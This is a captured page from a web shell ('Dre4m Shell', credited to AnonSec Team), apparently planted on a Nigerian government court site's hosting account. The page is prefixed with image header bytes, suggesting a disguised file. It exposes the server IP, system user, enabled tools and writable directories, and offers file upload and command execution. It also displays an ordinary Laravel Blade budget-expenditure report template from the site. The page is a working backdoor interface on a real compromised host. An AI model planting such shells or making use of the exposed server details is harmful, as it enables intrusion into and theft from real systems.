ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.16.212.211
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/c006e96b04fe3b5391d06b7b6110ce621fae77c5.php
<?php $__env->startSection('pageTitle'); ?>
 
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
<div class="box box-default" style= "border:none;">

        <div class="box-body">
     <?php echo $__env->make('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'Vote Report', 'title2'=>'', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>0, 'hideLogos'=>0, 'hideAddress'=>0], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> 
               

        <div class="box-header with-border hidden-print">
          <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
        </div>
       
	<form method="post"  id="thisform1" name="thisform1" >
		<?php echo e(csrf_field()); ?>

		<div class="box-body">
			 <div class="row hidden-print">
	            		<div class="col-md-2">
	            		<label>Period</label>
				<select name="period" id="period" class="form-control" onchange ="ReloadForm();" >
		                <option value="" selected>-Select Year-</option>
		                	<?php $__currentLoopData = $YearPeriod; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->Period); ?>" <?php echo e(($period) == $b->Period? "selected":""); ?>><?php echo e($b->Period); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div>
	            		<div class="col-md-2 ">
                  <label>From</label>
                  <input type="text" class="col-sm-9 form-control" value="<?php echo e($from); ?>" name="from" id="from">
              </div>
              <div class="col-md-2">
                    <label>To</label>
                    <input type="text" class="col-sm-9 form-control" value="<?php echo e($to); ?>" name="to" id="to">
            </div>
		            	<input type="hidden" name="allocationsource" value="5"/>
	            		<div class="col-md-2">
	            		<label>Account Type</label>
				        <select name="budgettype" id="budgettype" class="form-control" onchange ="ReloadForm();">
		                <option value="" selected>-All-</option>
		                	<?php $__currentLoopData = $BudgetType; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->ID); ?>" <?php echo e(($budgettype) == $b->ID? "selected":""); ?>><?php echo e($b->contractType); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div>
	            		<div class="col-md-2">
	            		<label>Economic Head</label>
				<select name="economichead" id="economichead" class="form-control" onchange ="ReloadForm();">
		                <option value="" selected>-All-</option>
		                	<?php $__currentLoopData = $EconomicHead; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
						<option value="<?php echo e($b->ID); ?>" <?php echo e(($economichead) == $b->ID? "selected":""); ?>><?php echo e($b->economicHead); ?></option>
		                	<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
		                </select>
	            		</div> 
	            	          		
	            	</div>
	            	 
			<button type="submit" class="btn btn-success" >
                                Relaod
                            </button>
	            		<div class="row">
	            		</div>
		<input id ="delcode" type="hidden"  name="delcode" >
		
		<div class="table-responsive" style="font-size: 12px; padding:10px;">
			<table class="table table-bordered">
			<thead>
				<tr >
			                <!--<th width="1%">S/N</th>	-->
			               	<th ></th>
			                <th >Eco/CD</th>	
			                <th >Description</th>	             
			                <th ><?php echo e($period-1); ?> <br>Appro</th>
			                <th ><?php echo e($period); ?> <br>Appro</th>
			                <th >Allo Release in <?php echo e(date('F', strtotime($to))); ?></th>
			                <th >Allo Release up to <?php echo e(date('F', strtotime($to))); ?></th>
			                <th >Expend <?php if($from==$to): ?> for the day <?php else: ?> between <?php echo e(date('d F, Y', strtotime($from))); ?> and <?php echo e(date('d F, Y', strtotime($to))); ?> <?php endif; ?></th>
			                <th >Total Expend. <br/> to date</th>
			                <th >Balance at hand</th>
			                <th >Balance for the year</th>
			               
			                
		          
				
			 	</tr>
			</thead>
						<?php $serialNum = 1; ?>
						<?php $grouphead = ""; ?>
						<?php $preappro = "0";
						$appr = "0";
						$thismonthappro = "0";
						$totalreceived = "0";
						$exp = "0";
						$totalexp = "0";
						$bal = "0";
						$balthisyr = "0";
						$grouphead = "0";
						$grouphead = "0";
						
						?>
						<?php $__currentLoopData = $QueryVoultReport; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
							<?php if($b->economicHeadID!=$grouphead): ?>
							<tr>
								<?php $grouphead = $b->economicHeadID; ?>
								<!--<td></td>-->
								<td><?php echo e($b->economicheadcode); ?></td><td></td>
								<td colspan=9><b><?php echo e($b->economichead); ?>  (<?php echo e($b->economicgroup); ?>-<?php echo e($b->allocationsource); ?>)</b></td>
							</tr>
							<?php endif; ?>
							<tr>
								<!--<td><?php echo e($serialNum ++); ?> </td>-->
								<td></td>
								<td><?php echo e($b->economiccode); ?></td>
								<td><?php echo e($b->economicdisc); ?></td>
								<td class="align"><?php echo e(number_format($b->preval,2)); ?></td>
								<td class="align"><?php echo e(number_format($b->allocationValue,2)); ?></td>
								<td class="align"><?php echo e(number_format($b->receivedthismonth,2)); ?></td>
								<td class="align"><?php echo e(number_format($b->receivedallocation,2)); ?></td>
								<td class="align"><?php echo e(number_format($b->expenditurebtw,2)); ?></td>
								<td class="align"><?php echo e(number_format($b->expendtodate, 2)); ?></td>
								<td class="align"><?php echo e(number_format($b->receivedallocation-$b->expendtodate,2)); ?></td>
								<td class="align"><?php echo e(number_format($b->allocationValue-$b->expendtodate,2)); ?></td>
								<?php $preappro += $b->preval;
        						$appr  += $b->allocationValue;
        						$thismonthappro += $b->receivedthismonth;
        						$totalreceived+= $b->receivedallocation;
        						$exp += $b->expenditurebtw;
        						$totalexp+= $b->expendtodate;
        						$bal += $b->receivedallocation-$b->expendtodate;
        						$balthisyr += $b->allocationValue-$b->expendtodate;
        						?>
								
							</tr>		
						<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>	
						<td Colspan="3">Total </td>
						
						<td class="align"><b><?php echo e(number_format($preappro,2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($appr,2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($thismonthappro,2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($totalreceived,2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($exp,2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($totalexp, 2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($bal,2)); ?></b></td>
						<td class="align"><b><?php echo e(number_format($balthisyr,2)); ?></b></td>
			 </table>
			 <button class="print hidden-print" type="submit" >Print</button>
		</div>
		</div>
		
	</form>
	
</div>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>

<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/1.5.2/css/buttons.dataTables.min.css">

<style>

.table tr th
{
text-transform:uppercase;
font-size: 14px;
}
.table tr td
{
font-size: 14px;
}
  @media  print{
.hidden-print{display:none!important}
 .dt-buttons, .dataTables_info, .dataTables_paginate, .dataTables_filter
{
display:none!important
}
}

  .align
{ 
 text-align:right;
}

</style>

<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/dataTables.buttons.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/buttons.print.min.js"></script>
 <script type="text/javascript" src="https://cdn.jsdelivr.net/momentjs/latest/moment.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/daterangepicker/daterangepicker.min.js"></script>
<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/daterangepicker/daterangepicker.css" />

  <script type="text/javascript">
 
	function  ReloadForm()
	{
	//alert("ururu")	;	
	document.getElementById('thisform1').submit();
	return;
	}

  $( function(){
   $("#from").datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
   $("#to").datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
    });
  </script>
 
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/Report/general_expenditure.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team